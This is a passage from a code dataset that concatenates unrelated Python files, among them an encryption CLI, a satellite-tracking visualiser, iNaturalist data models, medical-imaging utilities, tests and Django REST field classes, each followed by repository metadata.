    """
    recipient_keyfile = os.path.join(PUBLIC_PATH, arguments.recipient)

    if not os.path.exists(recipient_keyfile):
        raise FileNotFoundError('Recipient keyfile does not exist.')

    if not os.path.exists(PRIVATE_KEY):
        raise FileNotFoundError('Private keyfile does not exist.')

    with open(recipient_keyfile) as recipient_key, open(PRIVATE_KEY) as private_key:
        message = encrypt_and_sign(zlib.compress(arguments.infile.read(), level=9), recipient_key, private_key)

    sys.stdout.buffer.write(message)
def decrypt_binary(arguments):
    """
    Decrypts a file object when given an argparser arguments object. Not
    intended for use as an import.

    Reads the file object as a raw binary FinCrypt message (no base64 armor)
    and writes the decrypted, decompressed bytes to stdout; failures are
    reported on stderr.

    :param arguments: Argparser arguments object
    :return: None
    :raises FileNotFoundError: If either key file is missing.
    """
    sender_keyfile = os.path.join(PUBLIC_PATH, arguments.sender)

    if not os.path.exists(sender_keyfile):
        raise FileNotFoundError('Sender keyfile does not exist.')

    if not os.path.exists(PRIVATE_KEY):
        raise FileNotFoundError('Private keyfile does not exist.')

    in_message = arguments.infile.read()

    try:
        with open(PRIVATE_KEY) as private_key, open(sender_keyfile) as sender_key:
            message, verified = decrypt_and_verify(in_message, sender_key, private_key)
    except Exception as e:
        sys.stderr.write(str(e) + '\n')
        return

    if message is None:
        sys.stderr.write('Decryption failed.\n')
    else:
        try:
            sys.stdout.buffer.write(zlib.decompress(message))
        except Exception:
            sys.stderr.write('Decompression failed.\n')

    if not verified:
        sys.stderr.write('Verification failed. Message is not intact.\n')
def enum_keys(arguments):
    """
    Enumerates all keys residing in the public_keys directory.

    Prints to stdout a formatted description of each key, with:
    Filename, user name, email, SHA3-512 hash, and randomart.

    :param arguments: Argparser arguments object (unused)
    :return: None
    """
    key_enum = ''

    for key_file in os.listdir(PUBLIC_PATH):
        with open(os.path.join(PUBLIC_PATH, key_file)) as f:
            key_text = f.read()
        key = read_public_key(key_text)
        # Fingerprint the raw key text, formatted as colon-separated hex pairs.
        key_hash = sha.SHA3_512(key_text.encode('utf-8')).hexdigest()
        key_hash_formatted = ':'.join([key_hash[:64][i:i + 2] for i in range(0, len(key_hash[:64]), 2)]).upper()
        # Only use the first 64 characters of the hash so it fills up less of the board.
        key_randomart = randomart.RandomArt(hashalg='FinCrypt', room_size=(31, 15))
        key_randomart = key_randomart(key_hash)
        formatted_key = f"{key_file}:\nName: {key['name'].decode('utf-8')}\nEmail: {key['email'].decode('utf-8')}" \
                        f"\nHash: {key_hash_formatted}\nKeyArt:\n{key_randomart}"
        key_enum += formatted_key + '\n\n'

    sys.stdout.write(key_enum.strip())
def main():
    """
    Parses command line arguments and dispatches to the selected sub-command.

    Try fincrypt.py -h for help with arguments.

    :return: None
    """
    parser = argparse.ArgumentParser(
        description='Encrypt and decrypt using FinCrypt. Place your private key as '
                    './private_key/private.asc, and distribute your public key.')

    parser.add_argument('--enumerate-keys', '-N', action='store_const', dest='func', const=enum_keys)

    subparsers = parser.add_subparsers(title='sub-commands', description='Encryption and decryption sub-commands')

    parser_encrypt = subparsers.add_parser('encrypt', aliases=['e'], help='Encrypt a message/file.')
    parser_encrypt.add_argument('recipient', type=str, default=None,
                                help='The filename of the recipient\'s public key. '
                                     'Always defaults to the /public_keys directory.')
    parser_encrypt.add_argument('infile', nargs='?', type=argparse.FileType('rb'), default=sys.stdin.buffer,
                                help='File to encrypt. Defaults to stdin.')
    parser_encrypt.set_defaults(func=encrypt_text)

    parser_decrypt = subparsers.add_parser('decrypt', aliases=['d'], help='Decrypt a message.')
    parser_decrypt.add_argument('sender', type=str, default=None,
                                help='The filename of the sender\'s public key. '
                                     'Always defaults to the /public_keys directory.')
    parser_decrypt.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin,
                                help='The filename or path of the encrypted file. Defaults to stdin.')
    parser_decrypt.set_defaults(func=decrypt_text)

    parser_encrypt_binary = subparsers.add_parser('encryptbin', aliases=['eb'],
                                                  help='Encrypt a message/file with binary encoding. '
                                                       'Provides space savings at the cost of readability.')
    parser_encrypt_binary.add_argument('recipient', type=str, default=None,
                                       help='The filename of the recipient\'s public key. '
                                            'Always defaults to the /public_keys directory.')
    parser_encrypt_binary.add_argument('infile', nargs='?', type=argparse.FileType('rb'), default=sys.stdin.buffer,
                                       help='File to encrypt. Defaults to stdin.')
    parser_encrypt_binary.set_defaults(func=encrypt_binary)

    parser_decrypt_binary = subparsers.add_parser('decryptbin', aliases=['db'],
                                                  help='Decrypt a message/file with binary encoding.')
    parser_decrypt_binary.add_argument('sender', type=str, default=None,
                                       help='The filename of the sender\'s public key. '
                                            'Always defaults to the /public_keys directory.')
    # Bug fix: this reader is binary (FileType('rb')), so the default must be
    # the byte-level sys.stdin.buffer. The text-mode sys.stdin used previously
    # would hand decrypt_binary a str, crashing the Reed-Solomon decode.
    parser_decrypt_binary.add_argument('infile', nargs='?', type=argparse.FileType('rb'), default=sys.stdin.buffer,
                                       help='The filename or path of the encrypted file. Defaults to stdin.')
    parser_decrypt_binary.set_defaults(func=decrypt_binary)

    args = parser.parse_args()

    # No sub-command and no --enumerate-keys flag: show usage.
    if args.func is None:
        parser.print_help()
        sys.exit()

    args.func(args)


if __name__ == '__main__':
    main()
| 2.75 | 3 |
src/predictor.py | koriavinash1/Fetal-Brain-Segmentation | 10 | 12765122 | <filename>src/predictor.py
from __future__ import division
import numpy as np
import os, shutil, sys
import SimpleITK as sitk
import glob
from datetime import datetime
import time
from estimator import *
from config import *
from networks import *
from test_utils import *
from train_utils import *
if __name__ == "__main__":
    # Set Environment
    conf = conf()

    model_path = os.path.join(conf.output_dir, conf.run_name, 'best_model/latest.ckpt')
    test_data = 'path/to/test/data'

    patient_folders = next(os.walk(test_data))[1]
    save_dir = os.path.join(conf.output_dir, conf.run_name, 'predictions{}'.format(time.strftime("%Y%m%d_%H%M%S")))

    # if os.path.exists(save_dir):
    # 	shutil.rmtree(save_dir)
    # os.makedirs(save_dir)

    # for patient in patient_folders:
    # 	os.makedirs(os.path.join(save_dir, patient))

    inputs = getInputsPlaceholder(None, None, None, conf.num_channels)
    targets = getTargetsPlaceholder(None, None, None, conf.num_class)
    weight_maps = tf.placeholder(tf.float32, shape=[None, None, None])
    batch_class_weights = tf.placeholder(tf.float32)

    # define the net
    print('Defining the network')
    net = UNET(inputs,
               targets,
               weight_maps,
               num_class=conf.num_class,
               n_pool=3,
               n_feat_first_layer=[32],
               chief_class=conf.chief_class,
               weight_decay=5e-6,
               metrics_list=['plain_dice_loss', 'dice_score_class_1', 'dice_score_class_0', 'dice_score'],
               metric_to_optimize='plain_dice_loss',
               optimizer=Adam(1e-4),
               gpu_ids=[1])

    # initialise the estimator with the net
    print('Preparing the estimator..')
    trainer = Estimator(net_obj=net,
                        summary_dir='',
                        freq_list=[],
                        resume_training=False,
                        load_model_from=model_path,
                        config=conf,
                        prediction=True
                        )

    sequence_path, gt_path = get_test_data_path(test_data, gt_available=False)

    # Bug fix: `xrange` is Python 2 only and raises NameError on Python 3;
    # `range` behaves identically here on both interpreters.
    for i in range(len(sequence_path)):
        print("\n-----------------------------------------------------------------------")
        save_dir = 'path/to/save/prediction/'
        if not os.path.exists(save_dir):
            os.makedirs(save_dir)

        print("Working on Patient Number", str(i), save_dir)
        print("-----------------------------------------------------------------------\n")

        dice = trainer.LoadandPredict(sequence_path[i], None,
                                      preProcessList=['normalize'],
                                      postProcessList=['glcc'],
                                      crf=None,
                                      save_path=save_dir
                                      )
        # dices.append(dice)

    # print("\nAverage Dice : " + str(np.mean(dices)))
| 2.171875 | 2 |
pyinaturalist/models/observation_field.py | niconoe/pyinaturalist | 47 | 12765123 | from datetime import date, datetime
from typing import List, Union
from pyinaturalist.constants import TableRow
from pyinaturalist.converters import safe_split, try_int_or_float
from pyinaturalist.models import (
BaseModel,
LazyProperty,
Taxon,
User,
datetime_now_field,
define_model,
field,
)
# Mappings from observation field value datatypes to python datatypes
OFV_DATATYPES = {
    'dna': str,
    'date': date,
    'datetime': datetime,
    'numeric': try_int_or_float,
    'taxon': int,  # taxon values are stored as taxon IDs
    'text': str,
    'time': str,
}
# Union of python types an observation field value may be converted to
OFVValue = Union[date, datetime, float, int, str]
@define_model
class ObservationField(BaseModel):
    """:fa:`tag` An observation field **definition**, based on the schema of
    `GET /observation_fields <https://www.inaturalist.org/pages/api+reference#get-observation_fields>`_.
    """

    allowed_values: List[str] = field(converter=safe_split, factory=list)
    created_at: datetime = datetime_now_field(doc='Date and time the observation field was created')
    datatype: str = field(default=None)  # Enum
    description: str = field(default=None)
    name: str = field(default=None)
    updated_at: datetime = datetime_now_field(
        doc='Date and time the observation field was last updated'
    )
    user_id: int = field(default=None)
    users_count: int = field(default=None)
    uuid: str = field(default=None)
    values_count: int = field(default=None)

    @property
    def row(self) -> TableRow:
        """Attributes used to render this record as a table row."""
        return {
            'ID': self.id,
            'Type': self.datatype,
            'Name': self.name,
            'Description': self.description,
        }

    def __str__(self) -> str:
        # Bug fix: the suffix must be an f-string; without the `f` prefix the
        # literal text '{self.description}' was emitted instead of the value.
        description = f': {self.description}' if self.description else ''
        return f'[{self.id}] {self.name} ({self.datatype}){description}'
@define_model
class ObservationFieldValue(BaseModel):
    """:fa:`tag` An observation field **value**, based on the schema of ``Observation.ofvs``
    from `GET /observations <https://api.inaturalist.org/v1/docs/#!/Observations/get_observations>`_.
    """

    datatype: str = field(default=None)  # Enum
    field_id: int = field(default=None)
    name: str = field(default=None)
    taxon_id: int = field(default=None)
    user_id: int = field(default=None)
    uuid: str = field(default=None)
    value: OFVValue = field(default=None)
    taxon: property = LazyProperty(
        Taxon.from_json, type=Taxon, doc='Taxon that the observation field applies to'
    )
    user: property = LazyProperty(
        User.from_json, type=User, doc='User that applied the observation field value'
    )

    # Unused attributes
    # name_ci: str = field(default=None)
    # value_ci: int = field(default=None)

    # Convert value by datatype
    def __attrs_post_init__(self):
        # Coerce ``value`` into the python type declared by ``datatype``;
        # unknown datatypes (and None values) are left untouched.
        if self.datatype in OFV_DATATYPES and self.value is not None:
            converter = OFV_DATATYPES[self.datatype]
            self.value = converter(self.value)

    @property
    def row(self) -> TableRow:
        """Attributes used to render this record as a table row."""
        return {
            'ID': self.id,
            'Type': self.datatype,
            'Name': self.name,
            'Value': self.value,
        }

    def __str__(self) -> str:
        return f'{self.name}: {self.value}'
| 2.375 | 2 |
model_a/utils.py | uSasha/pydata_demo | 6 | 12765124 | import redis
class ClueLogger:
    """Publish model output values to a Redis stream keyed by block name."""

    def __init__(self, block, model):
        # ``model`` is accepted but not stored; callers pass the model name
        # again on each out() call. Kept as-is for interface compatibility.
        self.block = block
        # Hostname 'redis' — presumably a docker-compose service name; confirm.
        self.r = redis.StrictRedis('redis')

    def out(self, model, value):
        """Append one {model, value} entry to the stream named self.block."""
        self.r.xadd(self.block, {'model': model, 'value': value})
| 2.515625 | 3 |
2d.py | tsmpatagonia/Real-Time-Satellite-Tracking | 0 | 12765125 | # Homework for UB DMS 423 - Fall 14
# by <NAME>
#
# Real-time Satellite Visualization
# Input Data type: TLS(Two-line element set)
# Can be found at http://www.celestrak.com/NORAD/elements/
#
# How to control:
# Click a satellite to display its orbit.
# Press H to show/hide all orbits on-screen.
# Press UP/DOWN to change satellite category.
# Press LEFT/RIGHT to adjust orbit interval for line drawing.
#
import ephem, datetime, math, urllib.request, urllib.parse, urllib.error
from pyglet.gl import *
resource = [["GlobalStar", "globalstar"]]
window = pyglet.window.Window(1024,576)
total = 50
interval = 20
batch = pyglet.graphics.Batch()
class Background:
    """A textured x-by-y pixel quad at the given offset, rendered with
    legacy fixed-function OpenGL."""

    def __init__(self, x,y, xoffset,yoffset, texturefile):
        self.texture = pyglet.image.load(texturefile).get_texture()
        # Quad vertices in triangle-strip order, with full-texture UV coords.
        self.vlist = pyglet.graphics.vertex_list(4, ('v2f', [xoffset,yoffset, xoffset+x,yoffset, xoffset,yoffset+y, xoffset+x,yoffset+y]), ('t2f', [0,0, 1,0, 0,1, 1,1]))

    def draw(self):
        """Render the textured quad with alpha blending enabled."""
        glEnable(GL_BLEND)
        glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
        glColor3f(1,1,1)
        glEnable(GL_TEXTURE_2D)
        glBindTexture(GL_TEXTURE_2D, self.texture.id)
        glPushMatrix()
        self.vlist.draw(GL_TRIANGLE_STRIP)
        glPopMatrix()
        glBindTexture(GL_TEXTURE_2D, 0)
        glDisable(GL_TEXTURE_2D)
        glDisable(GL_BLEND)
class Satellite:
    """One tracked satellite: a pyephem TLE body plus its pyglet drawables
    (marker dot, translucent halo, name label, ground-track polyline)."""

    def __init__(self, name, l1, l2, yoffset):
        # NOTE(review): the `name` parameter is unused — the body is created
        # as "GS" and the on-screen label uses self.e.name instead. Confirm.
        self.e = ephem.readtle("GS", l1, l2)
        self.vlist = pyglet.graphics.vertex_list(4, ("v2f",[-1,1, -1,-1, 1,-1, 1,1]))
        self.circle = pyglet.shapes.Circle(0, 0, 1, color=(245,120,76), batch=batch)
        self.size = 3        # marker radius in px; squared in the click hit test
        self.showline = 0    # 1 while this satellite's orbit line is visible
        self.yoffset = yoffset  # vertical offset of the map area in the window

    def compute(self):
        """Recompute the sub-satellite point for "now" and its screen position."""
        self.e.compute(datetime.datetime.utcnow())
        self.long = math.degrees(float(self.e.sublong))
        self.lat = math.degrees(float(self.e.sublat))
        # Equirectangular projection: 1024 px / 360 deg = 128/45 px per degree,
        # centred at (512, 256) within the map area.
        self.x = (self.long * 128/45) + 512
        self.y = (self.lat * 128/45) + 256 + self.yoffset
        self.label = pyglet.text.Label(self.e.name, x=7,y=0, anchor_y="center", color=(255,255,255,255))

    def draw(self):
        """Draw the solid marker dot and the name label."""
        glEnable(GL_BLEND)
        glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
        glColor4f(1,0,0,1)
        self.circle.opacity = 255
        glPushMatrix()
        glTranslatef(self.x, self.y, 0)
        glRotatef(30, 0, 0, 1)
        self.label.draw()
        glScalef(self.size, self.size, self.size)
        #self.vlist.draw(GL_TRIANGLE_FAN)
        self.circle.draw()
        glPopMatrix()
        glDisable(GL_TEXTURE_2D)
        glDisable(GL_BLEND)

    def draw_alpha(self):
        """Draw the large translucent halo around the marker."""
        glEnable(GL_BLEND)
        glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
        #glColor4f(.2,.7,.2,.5)
        self.circle.opacity = 50
        glPushMatrix()
        glTranslatef(self.x, self.y, 0)
        glRotatef(0, 0, 0, 0)
        self.label.draw()
        glScalef(40, 40, 40)
        #self.vlist.draw(GL_TRIANGLE_FAN)
        self.circle.draw()
        glPopMatrix()
        glDisable(GL_TEXTURE_2D)
        glDisable(GL_BLEND)

    def draw_line(self):
        """(Re)build and draw the ground-track polyline; the alpha channel is
        self.showline, so a "hidden" line is drawn fully transparent."""
        self.init_line()
        glEnable(GL_BLEND)
        glColor4f(.7,.7,.7,self.showline)
        glPushMatrix()
        for x in self.vline_list:
            x.draw(GL_LINE_STRIP)
        glPopMatrix()
        glDisable(GL_BLEND)

    def init_line(self):
        """Sample the orbit from -total to +total steps of `interval` seconds
        around now, splitting the polyline wherever the track wraps around
        the map's left/right edge."""
        self.lines, self.vline_list, current_line = [], [], []
        for x in range(-total,total):
            temp = datetime.datetime.utcnow() + datetime.timedelta(seconds=interval*x)
            self.e.compute(temp)
            x = (math.degrees(float(self.e.sublong)) * 128/45) + 512
            y = (math.degrees(float(self.e.sublat)) * 128/45) + 256 + self.yoffset
            if len(current_line) > 1:
                # TO AVOID LINE FROM LEFT TO RIGHT
                temp_x, temp_y = current_line[-2], current_line[-1]
                if temp_x - x > 600:
                    # From right edge to left edge
                    current_line.extend((x+1024,y))
                    self.lines.append(current_line)
                    current_line = []
                    current_line.extend((temp_x-1024,temp_y))
                elif temp_x - x < -600:
                    # From left edge to right edge
                    current_line.extend((x-1024,y))
                    self.lines.append(current_line)
                    current_line = []
                    current_line.extend((temp_x+1024,temp_y))
            current_line.extend((x,y))
        self.lines.append(current_line)
        for x in self.lines:
            self.vline_list.append(pyglet.graphics.vertex_list(int(len(x)/2), ("v2f", x)))
def init():
    """Create the global scene objects: satellite list, background map and
    the static UI text labels."""
    global background_map, background_banner, category_num
    global text_current_set, text_current_time, text_infos, text_infos_2, text_infos_3
    open_new_file(0)
    category_num = 0
    #background_map = Background(1024,512,0,64,"assets/blue.jpg")
    #background_map = Background(1024,512,0,64,"assets/bluer.jpg")
    background_map = Background(1024,512,0,64,"assets/map2_4096.png")
    #background_banner = Background(1024,128,0,0,"assets/bg.png")
    text_current_set = pyglet.text.Label("Sats on Screen: " + resource[category_num][0], x=15, y=42, anchor_y="center", color=(255,255,255,200))
    text_current_time = pyglet.text.Label("UTC Time: " + datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), x=15, y=22, anchor_y="center", color=(255,255,255,200))
    text_infos = pyglet.text.Label("Click a satellite to display its orbit, Press H to show/hide all orbits on-screen.", x=460, y=50, anchor_y="center", color=(255,255,255,200))
    text_infos_2 = pyglet.text.Label("Press UP/DOWN to change satellite category.", x=460, y=32, anchor_y="center", color=(255,255,255,200))
    text_infos_3 = pyglet.text.Label("Press LEFT/RIGHT to adjust orbit interval for line drawing.", x=460, y=14, anchor_y="center", color=(255,255,255,200))
@window.event
def on_draw():
    """Render one frame: background map, UI labels, then every satellite's
    marker, halo and (possibly transparent) orbit line."""
    glClear(GL_COLOR_BUFFER_BIT)
    background_map.draw()
    #background_banner.draw()
    text_current_set.draw()
    text_current_time.draw()
    text_infos.draw()
    text_infos_2.draw()
    text_infos_3.draw()
    for x in sats:
        x.draw()
        x.draw_alpha()
        x.draw_line()
def update(dt):
    """Clock callback: refresh the time/category labels and recompute every
    satellite's position. New Label objects are built each tick; updating
    the existing labels' text would avoid the churn, kept as-is here."""
    global text_current_time, text_current_set
    text_current_time = pyglet.text.Label("UTC Time: " + datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), x=15, y=22, anchor_y="center", color=(255,255,255,200))
    text_current_set = pyglet.text.Label("Sats on Screen: " + resource[category_num][0], x=15, y=42, anchor_y="center", color=(255,255,255,200))
    for x in sats:
        x.compute()
def distance(a, b):
    """Squared Euclidean distance between 2-D points *a* and *b*
    (kept squared so callers can compare against a squared radius)."""
    dx = a[0] - b[0]
    dy = a[1] - b[1]
    return dx * dx + dy * dy
def open_new_file(num):
    """Download the TLE set for category *num* from CelesTrak and rebuild
    the global satellite list (three TLE lines per satellite)."""
    global source, lines, sats, show_all_line
    # source = open("data/"+resource[num][1] + ".txt")
    # Uncomment following lines for online access
    name = resource[num][1]
    # NOTE(review): plain-HTTP fetch of celestrak — consider https.
    url = "http://www.celestrak.com/NORAD/elements/" + name +".txt"
    source = urllib.request.urlopen(url).readlines()
    lines = [line.decode("utf-8").replace("\r\n", "") for line in source]
    sats = []
    show_all_line = 0
    for x in range(int(len(lines) / 3)):
        e = Satellite(lines[x * 3], lines[x * 3 + 1], lines[x * 3 + 2], 64)
        e.compute()
        sats.append(e)
@window.event
def on_mouse_press(x,y, dx,dy):
    """Toggle the orbit line of the satellite under the cursor and hide all
    others.

    NOTE(review): pyglet passes (x, y, button, modifiers); the last two
    parameters are misnamed here but unused, so behaviour is unaffected.
    """
    global show_all_line
    show_all_line = 0
    refresh_all_line([None])
    for o in sats:
        # Hit test against the squared marker radius (distance() is squared).
        if distance((o.x,o.y), (x,y)) <= o.size ** 2:
            o.showline = int(not o.showline)
            refresh_all_line([o])
def refresh_all_line(withouts):
    """Reset every satellite's orbit-line flag to the global default,
    leaving alone any satellite listed in *withouts* (callers always pass
    a single-element list)."""
    for sat in sats:
        for excluded in withouts:
            if sat != excluded:
                sat.showline = show_all_line
@window.event
def on_key_press(symbol, modifiers):
    """Keyboard controls: H toggles all orbit lines, UP/DOWN cycle the
    satellite category, LEFT/RIGHT adjust the orbit sampling interval
    (clamped to [10, 500] seconds, in steps of 20)."""
    global show_all_line, category_num, interval
    key = pyglet.window.key
    if symbol == key.H:
        show_all_line = not show_all_line
        refresh_all_line([None])
    elif symbol == key.UP:
        category_num = (category_num + 1) % len(resource)
        open_new_file(category_num)
        update(0)
    elif symbol == key.DOWN:
        category_num = (category_num - 1) % len(resource)
        open_new_file(category_num)
        update(0)
    elif symbol == key.LEFT:
        interval = max(interval - 20, 10)
    elif symbol == key.RIGHT:
        interval = min(interval + 20, 500)
# Build the scene, recompute satellite positions once per second, and start
# the pyglet event loop.
init()
pyglet.clock.schedule_interval(update, 1/1.0)
pyglet.app.run()
meridian/acupoints/quze12.py | sinotradition/meridian | 5 | 12765126 | <reponame>sinotradition/meridian<filename>meridian/acupoints/quze12.py
#!/usr/bin/python
#coding=utf-8
'''
@author: sheng
@license:
'''

# Acupoint metadata for Quze (PC3, 曲泽): the 3rd point on the
# Pericardium Channel of Hand-Jueyin.
SPELL=u'qūzé'  # pinyin spelling with tone marks
CN=u'曲泽'  # Chinese name
NAME=u'quze12'  # internal identifier used by the package
CHANNEL='pericardium'
CHANNEL_FULLNAME='PericardiumChannelofHand-Jueyin'
SEQ='PC3'  # standard acupoint code

if __name__ == '__main__':
    pass
| 1.25 | 1 |
src/detection_efffdet/utils.py | yellowdolphin/SIIM-COVID19-Detection | 153 | 12765127 | <filename>src/detection_efffdet/utils.py
import random
import os
import numpy as np
import torch
import pandas as pd
from mean_average_precision import MetricBuilder
import pickle
# Study-level class names (SIIM-COVID19 labels); list order defines the
# class index used throughout this module.
classes = [
    'Negative for Pneumonia',
    'Typical Appearance',
    'Indeterminate Appearance',
    'Atypical Appearance'
]
def seed_everything(seed=123):
    """Seed every RNG used in this project for reproducible runs.

    Covers python's ``random``, numpy and pytorch (CPU + current GPU) and
    configures cuDNN for deterministic behaviour.
    """
    random.seed(seed)
    # NOTE: setting PYTHONHASHSEED after interpreter start does not change
    # hashing in the current process; kept so spawned subprocesses inherit it.
    os.environ['PYTHONHASHSEED'] = str(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)
    torch.backends.cudnn.deterministic = True
    # Bug fix: benchmark mode lets cuDNN auto-select (non-deterministic)
    # algorithms, which contradicts ``deterministic = True`` above.
    torch.backends.cudnn.benchmark = False
def refine_det(boxes, labels, scores):
    """Clip normalized boxes to [0, 1], drop degenerate (zero-width or
    zero-height) detections, and reorder each box as
    (xmin, ymin, xmax, ymax). Labels/scores stay aligned with the kept boxes.
    """
    clipped = boxes.clip(0, 1)
    kept_boxes, kept_labels, kept_scores = [], [], []
    for (x1, y1, x2, y2), label, score in zip(clipped, labels, scores):
        if x1 == x2 or y1 == y2:
            # zero area after clipping — discard
            continue
        kept_boxes.append([min(x1, x2), min(y1, y2), max(x1, x2), max(y1, y2)])
        kept_labels.append(label)
        kept_scores.append(score)
    return kept_boxes, kept_labels, kept_scores
def get_study_map(df, pred_dict, num_classes=6, stride=0.1):
    """Compute mean average precision for the SIIM-COVID19 study task.

    Args:
        df: one row per image; must carry the study-level one-hot class
            columns (see ``classes``), 'studyid', 'imageid' and — when
            num_classes == 6 — the image-level 'label' string.
        pred_dict: imageid -> per-class probability vector, one entry per
            name in ``classes``.
        num_classes: 4 = study-level classes only; 6 adds the image-level
            'none' (id 4) / 'opacity' (id 5) pseudo-classes.
        stride: recall-threshold step used when integrating the PR curve.

    Returns:
        dict with overall 'mAP' plus per-class average precision.
    """
    assert num_classes in [4,6]
    metric_fn = MetricBuilder.build_evaluation_metric("map_2d", async_mode=True, num_classes=num_classes)
    ### Study level ###
    for studyid, grp in df.groupby('studyid'):
        gts = []
        for clsidx, clsname in enumerate(classes):
            # Every image of a study must share the same study-level label.
            assert len(np.unique(grp[clsname].values)) == 1
            if grp[clsname].values[0] == 1:
                gts.append([0, 0, 1, 1, clsidx, 0, 0])
        gts = np.array(gts)
        study_preds = []
        for _, row in grp.iterrows():
            study_preds.append(pred_dict[row['imageid']])
        study_preds = np.array(study_preds)
        # Average per-image probabilities into one study-level prediction.
        study_preds = np.mean(study_preds, axis=0)
        preds = []
        for clsidx in range(len(classes)):
            preds.append([0, 0, 1, 1, clsidx, study_preds[clsidx]])
        preds = np.array(preds)
        metric_fn.add(preds, gts)
    ### Image level ###
    if num_classes == 6:
        for _, row in df.iterrows():
            gts = []
            # 'label' is a flat string: name conf x1 y1 x2 y2, repeated.
            arr = row['label'].split(' ')
            nums = len(arr) // 6
            for i in range(nums):
                class_name = arr[6*i]
                conf = int(arr[6*i+1])
                if class_name == 'opacity':
                    clsid = 5
                else:
                    clsid = 4
                x1 = int(float(arr[6*i+2]))
                y1 = int(float(arr[6*i+3]))
                x2 = int(float(arr[6*i+4]))
                y2= int(float(arr[6*i+5]))
                gts.append([x1, y1, x2, y2, clsid, 0, 0])
            gts = np.array(gts)
            # Fixed dummy full-image 'none' prediction for every image.
            preds = np.array([[0, 0, 1, 1, 4, 1]])
            metric_fn.add(preds, gts)
    result = metric_fn.value(iou_thresholds=0.5, recall_thresholds=np.arange(0., 1.0+stride, stride), mpolicy='soft')
    average_precision = {}
    for clsid in range(num_classes):
        average_precision[clsid] = []
    # Collect per-class AP across every evaluated IoU threshold.
    for k, v in result.items():
        if k=='mAP':
            continue
        for clsid in range(num_classes):
            average_precision[clsid].append(v[clsid]['ap'])
    output = {
        'mAP': result['mAP'],
    }
    for clsid in range(num_classes):
        average_precision[clsid] = np.mean(average_precision[clsid])
        if clsid < len(classes):
            output[classes[clsid]] = average_precision[clsid]
        elif clsid == 4:
            output['none'] = average_precision[clsid]
        else:
            output['opacity'] = average_precision[clsid]
    return output
def save_dict(obj, name):
    """Pickle *obj* to the file at path *name* using the highest protocol."""
    with open(name, 'wb') as fh:
        pickle.dump(obj, fh, pickle.HIGHEST_PROTOCOL)


def load_dict(name):
    """Load and return a previously pickled object from the file at *name*."""
    with open(name, 'rb') as fh:
        return pickle.load(fh)
topicmodelling/hdp/ConvertTopicDisplayFormat.py | awbennett/HCA-WSI | 6 | 12765128 | """
Quick and simple python program that converts the ugly and dumb vertical display of topics
to horizontal display (1 topic per line).
Usage: ConvertTopicDisplayFormat.py
Stdin: topics.txt
Stdout: mod_topics.txt
Other Input: N/A
Other Output: N/A
Author: <NAME>
Date: Sep 11
"""
import sys
topics=[] #[[topic1], [topic2], ...]
line_id = 0
for line in sys.stdin:
data = line.strip().split()
if line_id == 0:
for i in range(0, len(data)):
topics.append([])
else:
for i in range(0, len(data)):
topic_words = topics.pop(i)
topic_words.append(data[i])
topics.insert(i, topic_words)
line_id += 1
for topic in topics:
print " ".join(topic)
| 3.671875 | 4 |
feat/tests/test_utils.py | TiankangXie/feat | 0 | 12765129 | <filename>feat/tests/test_utils.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `feat` package."""
import pytest
import pandas as pd
from pandas import DataFrame, Series
import numpy as np
from os.path import join, exists
from .utils import get_test_data_path
from feat.utils import read_facet, read_openface, read_affectiva, registration, neutral, softmax, load_h5, load_pickled_model
from nltools.data import Adjacency
import unittest
def test_utils():
    """Exercise feat.utils helpers: landmark registration validation,
    softmax, and model/file loaders."""
    sample = read_openface(join(get_test_data_path(), 'OpenFace_Test.csv'))
    # 68 x/y landmark column names in OpenFace order.
    lm_cols = ['x_'+str(i) for i in range(0,68)]+['y_'+str(i) for i in range(0,68)]
    sample_face = np.array([sample[lm_cols].values[0]])
    registered_lm = registration(sample_face)
    # One registered face -> one 136-dim (68 x,y pairs) landmark vector.
    assert(registered_lm.shape==(1,136))
    # Invalid `method` values and malformed input shapes must be rejected.
    with pytest.raises(ValueError):
        registration(sample_face, method='badmethod')
    with pytest.raises(TypeError):
        registration(sample_face, method = np.array([1,2,3,4]))
    with pytest.raises(AssertionError):
        registration([sample_face[0]])
    with pytest.raises(AssertionError):
        registration(sample_face[0])
    with pytest.raises(AssertionError):
        registration(sample_face[:,:-1])
    # Test softmax
    assert(softmax(0) == .5)
    # Test badfile.
    with pytest.raises(Exception):
        load_h5("badfile.h5")
    # Test loading of pickled model
    out = load_pickled_model()
    with pytest.raises(Exception):
        load_pickled_model("badfile.pkl")
src/unicef_restlib/fields.py | unicef/unicef-restlib | 1 | 12765130 | from collections import OrderedDict
from django.utils.translation import gettext_lazy as _
from model_utils import Choices
from rest_framework import serializers
from rest_framework.fields import empty, Field, SkipField
from rest_framework.utils import model_meta
from rest_framework_recursive.fields import RecursiveField
from unicef_restlib.utils import get_attribute_smart
class builtin_field:
    """Sentinel default for SeparatedReadWriteField's ``write_field``:
    "build the write field automatically from the model"."""
    pass
class ModelChoiceField(serializers.PrimaryKeyRelatedField):
    """PrimaryKeyRelatedField whose choices mapping is built lazily from
    the queryset on first access."""

    default_error_messages = {
        'does_not_exist': _('Invalid option "{pk_value}" - option is not available.'),
    }

    @property
    def choices(self):
        # On first access ``self._choices`` is the bound method below; it is
        # called once and its OrderedDict result cached on the instance.
        if hasattr(self._choices, '__call__'):
            self._choices = self._choices()
        return self._choices

    def get_choice(self, obj):
        """Return a (key, display) pair for *obj*. Subclasses must implement."""
        raise NotImplementedError

    def _choices(self):
        return OrderedDict(map(self.get_choice, self.get_queryset()))
class SeparatedReadWriteField(Field):
    """A DRF field that delegates reads to one field and writes to another.

    ``read_field`` handles serialization; ``write_field`` handles
    deserialization/validation. When ``write_field`` is left at the
    ``builtin_field`` sentinel, it is built automatically from the parent
    ModelSerializer's model metadata at bind time.
    """

    read_field = None
    write_field = None

    def __init__(self, read_field, write_field=builtin_field, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.read_field = read_field
        self.write_field = write_field

        # update fields from kwargs
        for kwarg_name in {'label', } & set(kwargs.keys()):
            setattr(self.read_field, kwarg_name, kwargs[kwarg_name])
